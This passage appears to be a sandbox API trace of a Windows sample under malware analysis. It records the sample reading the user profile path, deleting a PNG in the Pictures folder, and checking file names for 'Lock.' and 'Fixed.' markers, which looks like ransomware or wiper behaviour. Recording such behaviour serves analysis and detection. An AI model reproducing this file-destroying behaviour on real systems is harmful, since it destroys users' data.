[0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.513] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.514] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.514] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.514] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.514] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.514] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.514] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.514] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.514] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.514] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.514] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.514] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.514] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.514] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.515] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.515] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0256.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/SLYhvryE1GJ5.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png", lpFilePart=0x8bedfc*="SLYhvryE1GJ5.png") returned 0x37 [0256.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0256.517] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\slyhvrye1gj5.png")) returned 0x20 [0256.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9256b960, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xd4867660, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xd4867660, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0x16aa, dwReserved1=0x4, cFileName="SLYhvryE1GJ5.png", cAlternateFileName="SLYHVR~1.PNG")) returned 0xaa5960 [0256.517] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\slyhvrye1gj5.png")) returned 1 [0256.518] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9256b960, ftCreationTime.dwHighDateTime=0x1d4c9f3, ftLastAccessTime.dwLowDateTime=0xd4867660, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xd4867660, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0x16aa, dwReserved1=0x4, cFileName="SLYhvryE1GJ5.png", cAlternateFileName="SLYHVR~1.PNG")) returned 0 [0256.518] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0256.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.519] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0256.519] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0256.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.519] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0256.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/SLYhvryE1GJ5.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png", lpFilePart=0x8bf658*="SLYhvryE1GJ5.png") returned 0x37 [0256.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0256.521] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SLYhvryE1GJ5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\slyhvrye1gj5.png")) returned 0xffffffff [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ur-fU4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r-fU4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-fU4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fU4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0256.523] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0256.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ur-fU4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r-fU4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-fU4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fU4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4s.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: 